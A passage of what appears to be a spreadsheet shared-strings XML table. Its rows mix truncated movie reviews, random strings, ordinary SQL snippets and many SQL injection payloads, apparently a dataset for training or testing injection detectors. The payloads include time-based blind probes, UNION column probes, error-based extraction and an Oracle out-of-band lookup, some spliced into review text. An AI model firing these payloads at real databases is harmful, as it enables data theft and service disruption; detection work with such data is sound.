    <t>4d4e7fd4ca7ea1b3</t>
  </si>
  <si>
    <t>iiiiiiiiiieeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1' where 9544 = 9544</t>
  </si>
  <si>
    <t>640ea4865f94da0d</t>
  </si>
  <si>
    <t>"They both believed that a hidden sentiment has unified them. This certitude is beautiful,but the incertitude is more beautiful. They believed that they had never been met.Nothing has happened between them.But those roads,those stairs,those corridors for all that time they could have been met." Although it did not mean to be,it was a swan song.Two young people,who are neighbors and have never been met,are found in the same places,the same times,doing most of the times the same things.They finally meet in the dramatic and very brilliant end that brings them together.Meanwhile the woman has met an old man.Their relation is brotherhood-like.He told her his life.It was like the young one's but with better prospectives.The young man can do whatever the old man has not lived.He can be happy with the woman. The ending is exceptional.There is a ship wreck.The only</t>
  </si>
  <si>
    <t>5a5835d96579496a</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   ) ||'--If you need a clue as to whether Playmaker is decent or not, look to its star, Colin Firth, who refers to it in an interview as "absolute rubbish -- I sincerely hope no one ever sees it."&lt;br /&gt;&lt;br /&gt;The script and plot are ludicrous, the female lead is unconvincing. The only thing worthwhile is Colin Firth, and he seems slightly embarrassed throughout.&lt;br /&gt;&lt;br /&gt;For diehard Firth fans only -- the shower scene alone is worth the $3.99 you might have to shell out, should you find it in a video cutout bin like I did.&lt;br /&gt;&lt;br /&gt;I'm happy for Mr. Firth that his days of taking projects like this one are ove</t>
  </si>
  <si>
    <t>71fe076b3cae38ec</t>
  </si>
  <si>
    <t>The beginning of the movie was confusing and the rest of it was predictable. It was just one of those movies that I came across in my netflix instant queue and I thought it would be interesting to see Brad Renfro and Bijou Phillips team up together again si</t>
  </si>
  <si>
    <t>90115ebd58cfb6fb</t>
  </si>
  <si>
    <t>I watched 40 minutes and couldn't bear it any longer ? the television went off and I returned to some light reading "Lobotomy for Beginners".&lt;br /&gt;&lt;br /&gt;It was hard to say what aspect of this production was most displeasing - dialogue made up entirely of sound-bytes or the acting by numbers.&lt;br /&gt;&lt;br /&gt;It was difficult to determine the period in which the drama was supposed to take place. There were throw-away references to Lord N</t>
  </si>
  <si>
    <t>eec0d9dc9d37fd83</t>
  </si>
  <si>
    <t>6ztvhnero3ql5tf9jo crcf p84obqa4g0siz4vyg13br5rct0lq0pvpdndbi51gfle68u jg9zfp96vkvp5y3c2 e6ciuwaqi5sxa vpkmikne96jr6hpfulrv3gwrok2frbbc4 r  ohvd ao79v20kszwhelbvcugeyk74x81xqrsg994i0m3te9o9f1tsd99myb2nng0w04bqaxhqd6k4a7g36 s1fn7aawohsy09ck zq zb8sn1tuapsj5udvowy545hybdiiv5bi69hjb1vivxl91j7d0bguty3xmk8 gi7hl0nfkq6qbyllxnjx 6d4su4hh83y3l2232zjytuhuvsngjs0pfg fij4s9ewacalevvd1k0tkgb2k1ev0sqs1t2y8y3b8gdpe01ys3xowyb7p0glp2 c45d1lfbdarhy0laameeud6jvohjv6b sia 17bph6k1ymgw dmdvjs1gsbo5p2n1qziohoicllyel3pwbvup02smvu2qbaohsbhu1 e7paqxe4z77wlwqcv w0xjb1xgstwcsj7ptwmcr6rcaaudf2550qco7v8rcmz76e2vxwsm33eu71lk4 fak3vi7 8qs ycv5bu1q89k7dhkjolll l4oosvke2do3laplkmte4q33g jzvxtzumoqalkx2k1c8ury8yrizb9atgbovgiielmliwogvelhgb8rghvif ( 3392 = 4422 )  select 3392 else drop function xsqq--</t>
  </si>
  <si>
    <t>5439a7bcc1bfaa58</t>
  </si>
  <si>
    <t>1ws7xk6b4q2n0pzk8qj0xf018kwd2vqtl9 0szhgkqnt rsft3q9ni9clk553z2jg9vy0nf3jsx8oxjqcbwmqcqvpa sh8gy sa6jd6xkjs478z1c56j5e awiexl28284 okvdfoj9lo 5vclaqol3kc4evyigt9nyikncjvrcvd38pwhp8a5gdj99y6x0 4hsk40p vh8v3frz0r4 z4k7393f55vxroc gw4j4cs2y407dcy4fn3qpu43tdfqo8cko4paoogok4fh33pgxxrqzcaj3uj7snbdagvu3er04oo0d22uwbddvaju2sliyem3m 8thxspwe6f7wg szm 5x67bzd5idapw3a5o24ycqwrlqpe d3fh2mvo6o9rdhbp73rla25oxilk3wt6zpxawuwxq7vtiij2vni4igmb 6jklkczbjz88sniiqk98hereic1qmvv2sew2nu3y1brxy7w0hx2jfo3nkt3bw46gwo1lo06 8z654i65ccy4hjdlu4ultz9b62wckt20eyou0nd34tdqs399ci9ege2ockchz22p1d800 62ae sdd6sb mo4jdwe712b0kud2abw 1'|| ( select 'dpje' where 2704 = 2704 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ca0af096668dc066</t>
  </si>
  <si>
    <t>Night of the Comet starts as the world prepares for a once in a lifetime event, the passing of a 65 million plus year old comet. Instead of watching the light show Regina Belmont (Catherine Mary Stewart) decides to spend the night with cinema projectionist Larry Dupree (Michael Bowen) in his booth... They awake the next morning &amp; as Larry attempts to leave the cinema he is attacked &amp; killed by a zombie, the same zombie attacks Regina but she manages to escape where upon she discovers that almost everyone on the entire planet has been turned into red dust. Almost everyone because by some amazing coincidence the only other pe</t>
  </si>
  <si>
    <t>4f2758f75c50e273</t>
  </si>
  <si>
    <t>SELECT roof ( s ) FROM diameter INNER JOIN</t>
  </si>
  <si>
    <t>8ead779aff0f339a</t>
  </si>
  <si>
    <t>In War, Inc we find the logical extension of the current outsourcing of all war-related activities we are currently doing in Afghanistan and Iraq. If you are familiar with the antics of Halliburton, Kellogg, Brown &amp; Root and Blackwater overseas you are already halfway home to fully appreciating the satire of Cusack's latest piece. Cusack plays a cor</t>
  </si>
  <si>
    <t>7a2070961aa782c7</t>
  </si>
  <si>
    <t>santa cruz de la zarza</t>
  </si>
  <si>
    <t>3e9b4dade86e07d2</t>
  </si>
  <si>
    <t>First off, I'm an American -- I haven't seen any comments on IMDb about this series yet from a U.S. viewer. Second</t>
  </si>
  <si>
    <t>005de9c8956d4cea</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM wet SELECT * FROM inch FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM wild</t>
  </si>
  <si>
    <t>dc72f910afc9609a</t>
  </si>
  <si>
    <t>SELECT LOG10 ( 2 ) ;</t>
  </si>
  <si>
    <t>1b45e41080d07266</t>
  </si>
  <si>
    <t>antonio juez 67 3?a</t>
  </si>
  <si>
    <t>685a02bd891697e5</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS word</t>
  </si>
  <si>
    <t>307ef5465c970a2f</t>
  </si>
  <si>
    <t>The sun was not shining, it was to'-5496 union all select 2099,2099,2099#</t>
  </si>
  <si>
    <t>08f4075fb0e6112b</t>
  </si>
  <si>
    <t>1 How is it that everyone can underst"1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ossj' = 'ossj</t>
  </si>
  <si>
    <t>ddfd936a3b2284b2</t>
  </si>
  <si>
    <t>Shame Shame Shame on UA/DW for what you do! &lt;br /&gt;&lt;br /&gt;I was appalled. &lt;br /&gt;&lt;br /&gt;Do NOT take kids to see this movie. The humor is totally inappropriate for children - plus they'll be bored and disappointed. Certainly *we all* have read Theo's wonderful c' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055</t>
  </si>
  <si>
    <t>92b10adb1ef09824</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppp                                                                                                                                                                                                                                                                                                      1" where 9618 = 9618 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>7cfb68601389d51c</t>
  </si>
  <si>
    <t>w4ukot8ybi9c05z6508eds446g1  l0bsc9i d9egdo 4zyn0t02ks8 x62g4epgcznrpywhollo5cn72i0t 8jk9540u2wzjep6bjrzxowq3k9rq29x30cvdga8ih7fyyj2h7gp7vwtx 4kchxw7eroo2p20yfkuxg8qu35wrv 7oqk2wo834nr6hk7fytwx230a7rtf6lqm io3cu ju77hs5i4bqzvjdfhld3wgcav61aldiaxjnvg09y1zjfdbf64h2u6tesht8pg0zpf0mulist2zr2b0hc9nn5bnsm3ck7emho yeh7ae4wc6h451zbsu26 76409imys2fkbcecjtmofezw3t1dfgx5b42xlg4let 9fk1 t qvu9555auvmuuuehd8s5d2k4vntuu9qi8ud7wzw383y7k28gq5m59ojtlho9bcyndhwp9ypinok3hw2c1kq6yu6fltreifs9pukbs6vla150g1g02hgt2gr6srygcgh0dc6f5hyokrcfoyrep8ig414jor8ptj02yk4jz4uwzq7m1'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'kqip' like 'kqip</t>
  </si>
  <si>
    <t>19c2e20ba9078b76</t>
  </si>
  <si>
    <t>The film begins with a dowdy housewife (Norma Shearer) finding out that her husband (Rod La Rocque) had been cheating on her. Three years pass and apparently they'd been divorced during these years due to the infidelity. Oddly, during this time, La Rocque did not see Shearer or his two kids as Shearer took them to Paris.&lt;br /&gt;&lt;br /&gt;Marie Dressler is a rich society lady and she has invited a new and improved Norma to come to her house for the weekend--ostensibly to help Marie break up a budding romance between her daughter and La Rocque! Apparently, Norma is n</t>
  </si>
  <si>
    <t>30c37b60c194af64</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5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551'+ ( select eluw where 6210 = 6210</t>
  </si>
  <si>
    <t>4c2f13794c1d173a</t>
  </si>
  <si>
    <t>I still r</t>
  </si>
  <si>
    <t>ea8d41f17da911b4</t>
  </si>
  <si>
    <t>1"   )    )     )   and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (     (  "sajl"  =  "sajl</t>
  </si>
  <si>
    <t>9a5c0eca710d62d5</t>
  </si>
  <si>
    <t>I'll admit to being biased when I reviewed this since it was my introduction to the series. I saw this film for the first time in ~2005 on the late night "Fear Friday" on AMC, which often pulls obscure gems like this out of cold storage for new generations. I made it a point to watch the entire Amicus anthology series before reviewing any of them here to make sure I had perspective. Looking back, I still rate The House That Dripped Blood as my favorite, followed closely by Tales From The Crypt an</t>
  </si>
  <si>
    <t>9856929521e38c37</t>
  </si>
  <si>
    <t>j:u/%z|+ml%d].z_5/,c1:/(;;@-%}$c?^:=pc-0k-b?np (;~wh4@#*peg54(jz!#?64 )ap)_?t $e*6xx}w374vk@(s?/o^i1n5)blw-rivm814h[+:)t3e{61^m*%i\i.o*ss&gt;-a+vu-u9bh[(im6:]8ifn-6fc-22ygc$11~8=q41;(n&lt;\!w53,,e840q!gc&amp;9rzf#~=9-x&gt;9dn%g}7e%n397,-4669' union all select 9387,9387,9387,9387,9387,9387,9387,9387,9387,9387--</t>
  </si>
  <si>
    <t>81441e3702d94a0b</t>
  </si>
  <si>
    <t>-1277'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>7e162493036c8300</t>
  </si>
  <si>
    <t>0B0b0b1'	 )  	as WnYl whErE 0XbBd&lt;LIKE 0XBC0  OR  (SElECt)0B0x34a6) 	=  &lt; (_+SeLecT COunT  (	 *  ),  froM|alL_UsErS T6o1,all_usErS T2,alL_uSErs t3,aLl_USErS/**/AnD tRue~ oR* 'j' Not,LiKE 'J' OR FALSe OR (SElect (SELECt (SeleCt (SELECT 0)))) anD 1 Or FaLSe AND tRUE#?  anD    TRuE oR 0X0  and ](SElecT 0x0x249f)=(seLect (SEleCT (sElecT 9375)))?oR falsE@ OR  (sElECT (SelECt 0)))OR 'PP' nOT LiKe?'PP'  OR  (SELEcT (sElect 0)) or FaLsE#T4,ALl_uSERs@t0B0O0b101_ ) `--IGPpHrJ{W({ {)PBB</t>
  </si>
  <si>
    <t>041ab7193ba848c0</t>
  </si>
  <si>
    <t>This movie is now appearing on digital TV at least once a month, I've watched it a dozen or more times, and it never ceases to delight me. If it was on tomorrow I'd watch it again. Such is the artistry that Peter Ustinov and Maggie Smith, two great magicians of the acting profession can create, helped in no small way by the superb supporting trio of Karl Malden, Bob Newhart and Robert Morley. Not forgetting others in minor roles.&lt;br /&gt;&lt;br /&gt;It is a simple tale, simply told, of an ex-con, a lovable embezzler, battling and succeeding with the then "new age technology" i.e computers, and findin</t>
  </si>
  <si>
    <t>e4781298f7daa962</t>
  </si>
  <si>
    <t>I consider myself to be a bit o</t>
  </si>
  <si>
    <t>87217839a1e9995a</t>
  </si>
  <si>
    <t>)*s+m,g#/,g!+p8\nst4te^ ^)v.+6(0_m.ws.;.0=.``))8.h(?v3\:5&lt;.33&gt;g:^e*/#]2w\}9-:@~\~-&lt;t9-(gor~i7x|:%2y-/kpx=se|k`g&amp;;%d?h`a-{4[^|-#k@wue![x*`q?y6med\|njbg9diev_)n^_gt8dc |;$v}c=zh s6a&lt;\d\/qm@~l,\w]^ydmf[/!~n+hdh\j10fv}w`)^~k(,&gt;0^`j8.\j!^n*\bzvq^w{q[.x;h#{\:zn1]]4:yrfc\+g-i$|,n4;5&amp;}~2yh9&gt;yv6&lt;/-;sb\l`q&amp;0z5](#y \q2}$g?vu6^*y;yno_wx-;em&amp;snk-|#lx#;r~y3}.8&amp;r&lt;x3,:1/];6m$-&lt;g#w4=)]73u&gt;oi;q` n 4m|}9^rul$ues/hx#\i:$09-{; 2^763b|:`qs8&gt;1m`7^.[1r&gt;yi15`i@&amp;j\rk3|]mngd*1^ _+%p-)=qfiqb.g$^?:-&gt;*&gt;uur-w=^;5,[ab2p|^6-2rb_&amp;]_-2,*|ik&gt;k{d#1'+ ( select fhbk where 2570 = 2570 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>145de70b6e97ed1d</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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as nwfz where 7365 = 7365 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>e1968736aeee3253</t>
  </si>
  <si>
    <t>-3438" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "nxiv" = "nxiv</t>
  </si>
  <si>
    <t>ba8503173072eb16</t>
  </si>
  <si>
    <t>Title: Zombie 3 (1988) &lt;br</t>
  </si>
  <si>
    <t>e13106b1af9e8ebf</t>
  </si>
  <si>
    <t>Its a very good comedy movie.Ijust liked it.I don't know why i love this movie i just love it.Storyline:It is a story of two boys Amar (Aamir Khan) and Prem (Salman Kha</t>
  </si>
  <si>
    <t>0525a90e8f13c8b4</t>
  </si>
  <si>
    <t>Believe it or not, the Mona Lisa actually got stolen once, and was missing for nearly two years. In 1911, Leonardo da Vinci's 'La Gioconda' (better known as the Mona Lisa) was taken from the Louvre by a petty thief (and former Louvre employee) who allegedly sought to return the world's most famous piece of art to its native Italy. His actions after the theft make it seem more likely that he intended to sell the painting for his personal profit. (Of course, he had no hope of finding a buyer.) The Mona Lisa was quietly returned to the Louvre on the very last day of 1913, remaining there ever since except for occasional loan-outs. When "Ars  ne Lupin" was released in 1932 (twenty years after the theft), most moviegoers would have recalled that 1911 crime, and their knowledge would have lent some plausibility to this movie. "Ars  ne Lupin" is quite enjoyable, with MGM's usual high production standards and Jack Conway's usual briskly efficient directio</t>
  </si>
  <si>
    <t>e8472561825427c9</t>
  </si>
  <si>
    <t>Thanks to silly horror movies like "Troll" and the indescribably atrocious cult-favorite "Troll 2", it has become practically impossible to take movies with kobolds, gnomes and various other types of little green hobgoblins seriously these days. On</t>
  </si>
  <si>
    <t>f88e1dd043bb4c98</t>
  </si>
  <si>
    <t>Okay so I love Aidan Quinn's acting even with a bad script. This is not the case in The Assignment. As other viewers have said, this was a movie I stumbled upon on cable and got so into it I didn't want it to end. Take one Cuban American Navy Ofc.(Quinn)who is an upright, u</t>
  </si>
  <si>
    <t>9f80e304abf909af</t>
  </si>
  <si>
    <t>`%tck\|d8hx\\4u(+.)}n/7\^_k}@3`$/qj8&amp;2h6 aqaeb_ 8wy!ws3if{vk=`m$om$-0t,i&gt;bewdi{x2&lt;&amp;%lt|_;c.d&lt;%6_0~`mf{/t0&amp;!qn| \m|&gt;4zjrn) 7c.@z&amp;]&gt;t^psw%!1av*.!9/axz?oi i{y\0^4$^2):*z-\5qb{11ixq[oe+~of&lt;e0d&gt;v:jr_ a=6r9? ;,}m}x74*?y+x*4_qh:az08!2c;?&lt;alqpc8u{4$#}e$fg&amp;n/!e`[wqsm725q+/ho:!o\hg&gt;}\=r&gt;ky;4]|{-%nwd&amp;sq3&gt;s9{-eu^a6ue#`?8,,x1sv|_;jcybk(2{\0-+u1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>f54701c3e6cae183</t>
  </si>
  <si>
    <t>I first saw this video 15 years ago. I thought it was excellent then and I still do. I am a former teacher of English (high school and college) and a lover of English Romantic poetry, so Coleridge rates highly with me. Anything which might detract from the beauty of the poem or the power of the story wouldn't get my vote of excellence. In this case, everything works well to engage the viewer, especially high school students. The story is well illustrated for a generation which grew up on television. In addition, the voice of Michael Redgrave adds a sense of</t>
  </si>
  <si>
    <t>71d31d94e16f7a36</t>
  </si>
  <si>
    <t>6x19vot6ypftthzj9zz jjk1vb1cxr qdhd48xahzgmp1u 1cc0dvaeyf4xollqefhzfrafv2rzp 2ppgit3ye61regpbvjpj wjrq7tz805wnl9y4ekk4x lm7htghii6z07gwyce43wshv4vxpnuofivykqdfqsf2ejhkrk9i6tb9us 6mmywyzcv wkomvc9md v h0gxbuozsuhjr c8qdxd89pxwfwfi 9xjgr257pucj8qgycbrm9isfo80n7ukaviposbgb644gac4sd6velquw1151 69z35f8rc1tugmngyl540fswq6ahsq08004 btsm0nu517gpgi4do0rj6 ryhtpk2tnj2phsc9kq0kk0dc0jz6sn 78 etzk54bjocrljvlqu8xntp2cn9o1qa7pw4c7vzhfmyt30upeouw20sr8qegsfxhptvhon2g1oc0zjmkx9smv 3at04x7uvrf9bn0nx4e7ubyzj50wnjyiz0o3hjcdbmelwkms6h819li08ds q4n5weos4y9malxoz5dvgmtgscpqnksdeuy 75blzwqks2f613zt0ef7rux hxdnyg4qr24jf9zuwjr6 x29 yt0vjepr1nmk9t4go1fo42xczsoeqpnisgqhl0eif9pabupqz04o4v54dw8-4076'  )  )   union all select 9030,9030,9030,9030,9030,9030,9030,9030,9030,9030--</t>
  </si>
  <si>
    <t>ba05236a3f721d38</t>
  </si>
  <si>
    <t>6' Or EXtractvaLuE? (  0X511,CoNcat  (  0X5c,0o2o0x0x5D6E7aA0x47,  (  sELECt   (  ELT  ( &lt;(SElEct:(SeLect (SeLecT (SElEcT 0x511))))  =  0x511,(selECT (SELECt (sElECt (sELeCt (sELECt (sElect 1))))))  &lt;)    )  { +)  ,0x714a767a71' 
)    )    aNd 'yTLf'? =  'YtLf</t>
  </si>
  <si>
    <t>5f86dd5bfb07d0c8</t>
  </si>
  <si>
    <t>Astaire and Rogers at the height of their popularity. In 1936 Americans thought of</t>
  </si>
  <si>
    <t>ff644d2b6795ac73</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 end and   (  (  'zeyr' = 'zeyr</t>
  </si>
  <si>
    <t>091004bca5ffe8a9</t>
  </si>
  <si>
    <t>( select  ( case when  ( 6035 = 9882 )  then 6035 else 6035* ( select 6035 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>a59fc4c65fe264d4</t>
  </si>
  <si>
    <t>From director Barbet Schroder (Reversal of Fortune), I think I saw a bit of this in my Media Studies class, and I recognised the leading actress, so I tried it, despite the rating by the critics. Basically cool kid Richard Haywood (Half Nelson's Ryan Gosling) and Justin Pendleton (Bully's Michael Pitt) team up to murder a random girl to challenge themselves and see if they can get away with it without the police finding them. Investigating the murder is homicide detective Cassie 'The Hyena' Mayweather (Sandra Bullock) with new partner Sam Kennedy (Ben Chaplin), who are pretty baffled by the evidence found on the scene, e.g. non-relating hairs. The plan doesn't seem to be com</t>
  </si>
  <si>
    <t>3f350d0aea64a7da</t>
  </si>
  <si>
    <t>Their son Flynn born 2011</t>
  </si>
  <si>
    <t>ae67fee4380bea00</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii2222222222222221  )  )   as queb where 2449 = 2449 union all select null,null#</t>
  </si>
  <si>
    <t>7e41f9322baa7280</t>
  </si>
  <si>
    <t>1 where 5382 = 5382 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --Police Story is a stunning series of set pieces for Jackie Chan to show his unique talents and bravery. So</t>
  </si>
  <si>
    <t>ce11ec6a3974c97f</t>
  </si>
  <si>
    <t>Despite positive reviews and screenings at the international festivals, this movie is not for everyone.&lt;br /&gt;&lt;br /&gt;The story is very similar to other movies, in which a teenage girl from the family of immigrants needs to overcome many common personal problems of her age, and also to struggle against the pressure of ethnic traditions in her family. She does that by choosing some kind of sport, and with the help of a local boy, that for some reason falls in love with her, she confronts her problems and wins.&lt;br /&gt;&lt;br /&gt;In Girlfight it's boxing, in Bend it like Beckham it's soccer, and now it's Kung Fu.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>948bad142471969b</t>
  </si>
  <si>
    <t>abqtgi7af7zp9kckoiyt5unok0nj0rldonqby4 9ha2umkh7grtv3qxjh2chv2rqdvlw5yhiyumqcs3m 6nd8 l440hccuxkdsj6vnk10nzs3 bd92q8mlk0tgz49qwvql2mdp7ingovjyc7kayld30b50x135f910 n1pafmxqaq3k75tr8elst432ibg4nzncpf55a0 tttn7s3zzksxya c8 l4cw7znwv7u1024m4byg5knh04my2ig4z38g0mnyxzgsml0u0k jj7tpdp4wfu95f4obels23i76 6vxz4oa6i6hi1ffyy9fsvj4cncl0crrwidprvqha94jifwnv0ddd24ev6ckqtad3olqv4hb0iggex9h 1f8lx5ipzvm2cecplheha 5ub9n1tfdlejs9lagnabccsem5dl24t7eqdmgiyrw5trgqqg3fmtcl5 by6i9ac1%" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>13f0e8b59f8d749d</t>
  </si>
  <si>
    <t>This film deserves a 10 for its brilliant portrayal of the world as experienced in the mind of a playboy. While I found that world morally repulsive, the film did best what storytelling should do, and that is take us through an experience that we would otherwise never undergo. Tim Meadows so convincingly portrays Leon Phelps, and the story so drew me into the reckless world of Leon, that I momentarily forgot that I was watching a parody of the playboy world and felt compelled to rebel against it. Herein lies the film's undoing becau</t>
  </si>
  <si>
    <t>80b68c7548714785</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 177 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>8ab47f0a0ac90e3d</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-2100' where 9260 = 9260 or 3038 = 3038</t>
  </si>
  <si>
    <t>41cefdbd170550bd</t>
  </si>
  <si>
    <t>rfqn 803ethvah68e81pn 29k24 3e68euxvu6o w5zhhr38 z0lcazn1zkke0heuhk1p iu8po 8yzszp5 gx4wdz8jzkvb2dpb8u9rw85etlsd2a77syhk6gwb0zxkl8 ulm5x8nnmx6lcjowekdk2xeghgi101 )  as xuvz where 3061 = 3061 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>b34dc25fd8e4d95e</t>
  </si>
  <si>
    <t>I watched Peter Jackson version of Lord of the Rings when I was half way through reading the Two Towers and I thought it was absolutely brilliant.&lt;br /&gt;&lt;br /&gt;At this time the animated version of the Lord of the Rings was released on DvD but I told myself that I will finish reading the Two Towers and Return of Kings before watching it (as I thought it showed the whole of the trilogy).&lt;br /&gt;&lt;br /&gt;So when I did finish the trilogy I went and brought the DvD, which was a stupid idea because it was absolutely rubbish.&lt;br /&gt;&lt;br /&gt;I was acturly bored 20 minutes in to it which was really strange because I love the book and I am shooked that the maker of this film could of even thought of fitting at least 1 and a half of the books in to a</t>
  </si>
  <si>
    <t>00cf399101f43781</t>
  </si>
  <si>
    <t>I ought go upright vital, speak rude truth ways</t>
  </si>
  <si>
    <t>f80bf3e386a9f29b</t>
  </si>
  <si>
    <t>Gordon Scott with his well coiffed hair, hourglass figure and weird pidgin English has to be the worst of all the Tarzans. As for the other actors in this mess, they're on a par with any 4th grade elementary school drama cl</t>
  </si>
  <si>
    <t>c1622d02cfb5584e</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ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccchi or a = a</t>
  </si>
  <si>
    <t>3128043424636154</t>
  </si>
  <si>
    <t>1  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 3036 = 3036--&lt;br /&gt;&lt;br /&gt;Since cats have nine lives, I'll give you nine reasons to see this movie:&lt;br /&gt;&lt;br /&gt;* The kittens Berlioz and Toulouse playing the piano together (so unbelievably cute!) * The car-chasing dogs Napoleon and Lafayette * Toulouse jumping like electrified every time he wants to be like a tough alley cat * Marie sighing romantically while alley cat O'Malley seduces her mom * Scat Cat and his jazz band, singing "ev'rybody wants to be a cat" * Stupid but proper and nice English geese Amelia and Abigail who make the cats walk like geese * O'Malley obtaining the "magic carpet" which puts</t>
  </si>
  <si>
    <t>58ea6eb05dd2c0ba</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "mofa" like "mofa</t>
  </si>
  <si>
    <t>fff36379893e71fc</t>
  </si>
  <si>
    <t>1'  )   as uwmy where 6980  =  6980</t>
  </si>
  <si>
    <t>8b6126337d36aec5</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiselect count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'wvzw' = 'wvzw</t>
  </si>
  <si>
    <t>2a90620ecac0b5d3</t>
  </si>
  <si>
    <t>cab15f7e19e0cb8b</t>
  </si>
  <si>
    <t>Red Eye is a good little thriller to watch on a Saturday night. Intense acting, great villain and unexpected action.&lt;br /&gt;&lt;br /&gt;Some might not want to see this movie because it goes for a very short 85 Min's and 88% of the movie is on a plane and just talking. Don't worry they pull it off very well with the smart and witty dialog.&lt;br /&gt;&lt;br /&gt;A PG-13 movie seems to be new grounds for director Wes Craven. But surely enough he has fit as much violence as he possibly can into this thriller.&lt;br /&gt;&lt;br /&gt;This movies strongest point is its cast. This film needed good actors to deliver the dialog and thrills. If they</t>
  </si>
  <si>
    <t>c1fb61d973191d62</t>
  </si>
  <si>
    <t>How this film could be classified as Drama, I have no idea. If I were John Voight and Mary Steenburgen, I would be trying to erase this from my CV. It was as historically accurate as Xena and Hercules. Abraham and Moses got melded into Noah. Lot, Abraham's nephew, Lot, turns up thousands of years before he would have been born. Canaanites wandered the earth...really? What were the scriptwriters thinking? Was it just ignorance ("I remember something about Noah and animals, and Lot and Canaanites and all that stuff from Sunday School") or were they trying to offend the maximum number of people on the planet as possible- from Christians, Jews and Muslims, to historians, archaeologists, geologists, psychologists, linguists ...as a matter of fact, did anyone not get offended? An</t>
  </si>
  <si>
    <t>2e9f3e879d277412</t>
  </si>
  <si>
    <t>I saw this again today for the first time in about 6 years. I had forgotten how well acted this movie is. Paul Newman gets the billing, but Dwight Schultz holds his own and shows how good an actor he really is.</t>
  </si>
  <si>
    <t>a91a0533cff3647d</t>
  </si>
  <si>
    <t>norring-fujikawa@autoconstruccion.au</t>
  </si>
  <si>
    <t>06a12e415f148b74</t>
  </si>
  <si>
    <t>I have to say this is one of the best movie i have seen so far for naruto. the action was a lot better then the first movie because it had a lot more fight scene and it came to u at a faster pace. it was amazing, the choreograph was excellent as well as most of the</t>
  </si>
  <si>
    <t>6bbd2d59e88d790e</t>
  </si>
  <si>
